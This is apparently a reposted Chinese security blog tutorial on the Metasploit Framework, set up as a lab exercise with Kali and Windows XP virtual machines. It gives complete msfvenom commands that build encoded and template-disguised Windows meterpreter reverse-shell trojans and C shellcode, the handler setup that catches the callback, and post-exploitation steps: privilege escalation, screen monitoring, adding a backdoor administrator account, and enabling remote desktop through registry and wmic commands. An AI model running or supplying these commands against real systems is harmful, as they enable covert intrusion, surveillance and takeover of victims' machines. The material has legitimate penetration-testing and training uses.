Metasploit Framework

admin 2023年2月21日12:28:40评论142 views字数 2874阅读9分34秒阅读模式

作者:Secbug

时间:20220904

公众号:漫步安全

知识星球:漫步安全

说明:知识有限,如有错误,还请指出,多担待。多谷歌、Github、百度,查看官方文档。

Metasploit Framework

metasploit Framework(MSF)漏洞利用框架

目前存在free、pro版,kali自带free版metasploit框架。

msfvenom 为metasploit框架中的木马生成器模块,用于生成木马。

msfconsole 为metasploit框架中控制台模块,用于控制受害者。

msfvenom

木马生成器

可生成php、asp、jsp、jar、apk、shell、exe多种木马。

msfvenom常用选项

-l <type> 列出所有的载荷、编码器、空指令...
-p <payload> 指定载荷或自定义载荷
-f <format> 指定输出格式
-e <encoder> 指定编码器格式
-a <arch> 指定架构
-o <path> 指定输出文件
-b <list> 去除坏字节
-i <count> 指定编码次数
-x <path> 指定模板
-k 当使用模板后,程序执行后,载荷将被分离到新的线程中执行
Metasploit Framework
Untitled

查看payloads

msfvenom --list payloads
Metasploit Framework
Untitled

查看encoders

msfvenom --list encoders
Metasploit Framework
Untitled

生成木马文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.26.131 LPORT=4444 --platform win --arch x86 -f exe -o S.exe

不同的payload,有不同的配置选项 可通过msfvenom -p payload —list-options来显示需要配置的环境

使用编码器生成木马文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.26.131 LPORT=4444 -e x86/shikata_ga_nai -i 10 --platform win --arch x86 -f exe -o S.exe

使用模板生成木马文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.26.131 LPORT=4444 -x ./template.exe -k --platform win --arch x86 -f exe -o S.exe

生成C代码

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.26.131 LPORT=4444 -a x86 --platform windows -e x86/shikata_ga_nai -i 15 -b 'x00' -f c -o shell.c

x00在C语言字符串中表示截断,所以需要去除掉x00 可以将代码内嵌进入其它源代码中编译,在程序运行时,主动加载运行

msfconsole

监控平台

使用方法

开启msf控制台

msfconsole
Metasploit Framework
Untitled

设置监听环境

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.26.131
set LPORT 4444
exploit
Metasploit Framework
Untitled

不同的模块,有不同的配置选项 可通过执行options来查看

整体流程

  1. msfvenom生成木马文件
  2. 将木马文件拷贝到受害机器
  3. 控制台设置相关参数,监听或发起连接
  4. 执行木马文件

反向shell msfvenom 需要指定攻击者方IP地址 msfconsole 需要设置攻击方IP地址 正向shell msfvenom 需要指定本地PORT,以便攻击方进行主动连接 msfconsole 需要指定受害者IP、PORT,主动连接受害者机器 两者区别:反向Shell由受害方主动发起连接,一般防火墙不会主动拦截

演示

实验环境

  1. KaLi 2022虚拟机
  2. windows XP虚拟机

实验过程中,可能需要临时关闭杀毒软件

实验过程

  1. msfvenom生成木马文件

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.26.131 LPORT=4444 -x ./SatGenNMEA.exe -k --platform win --arch x86 -f exe -o S.exe
    Metasploit Framework
    Untitled
  2. msfconsole开启监控

    Metasploit Framework
    Untitled
  3. 发送给受害者

    Metasploit Framework
    Untitled
  4. 点击运行

    Metasploit Framework
    Untitled
  5. msfconsole收到shell

    Metasploit Framework
    Untitled
  6. 更多命令

    ?
    Metasploit Framework
    Untitled

    查看路径、进程列表

    Metasploit Framework
    Untitled

    权限提升(msf会尝试内置的权限提升脚本进行提权)

    Metasploit Framework
    Untitled

    查看网络进程

    Metasploit Framework
    Untitled

    后续利用

    shell 获取命令行交互
    upload 上传
    download 下载
    screenshare 监控屏幕

    监控屏幕

    screenshare
    Metasploit Framework
    Untitled

    添加管理员账户,开启远程桌面登录

    shell
    net user test test /add
    net user test
    net localgroup administrators test /add

    Users组

    Metasploit Framework
    Untitled

    Administrators组

    Metasploit Framework
    Untitled

    远程桌面连接

    受害者shell中执行

    windows 家庭版可能无wmic,可以拷贝一份,利用upload上传

    设置远程桌面端口
    reg add "HKLMSystemCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
    #开启远程桌面
    wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
    #检查端口状态
    netstat -an|find "3389"
    #关闭远程桌面
    wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0

    kali console执行

    rdesktop 192.168.26.130

更多参考文章

  1. https://www.pa55w0rd.online/msfvenom _use/
  2. https://docs.rapid7.com/metasploit/metasploit-basics/
  3. https://blog.csdn.net/liduquan/article/details/103105886


原文始发于微信公众号(漫步安全):Metasploit Framework

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月21日12:28:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Metasploit Frameworkhttp://cn-sec.com/archives/1276510.html

发表评论

匿名网友 填写信息